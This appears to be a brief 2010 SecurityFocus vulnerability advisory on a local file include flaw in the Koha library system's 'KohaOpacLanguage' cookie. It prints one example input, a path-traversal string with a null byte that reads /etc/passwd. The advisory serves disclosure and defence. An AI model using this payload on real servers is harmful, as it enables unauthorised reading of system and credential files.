Koha 'KohaOpacLanguage' Cookie Parameter Local File Include Vulnerability

Attackers can use a browser to exploit this issue.

The following example input is available:

KohaOpacLanguage=../../../../../../../../etc/passwd%00


 

Privacy Statement
Copyright 2010, SecurityFocus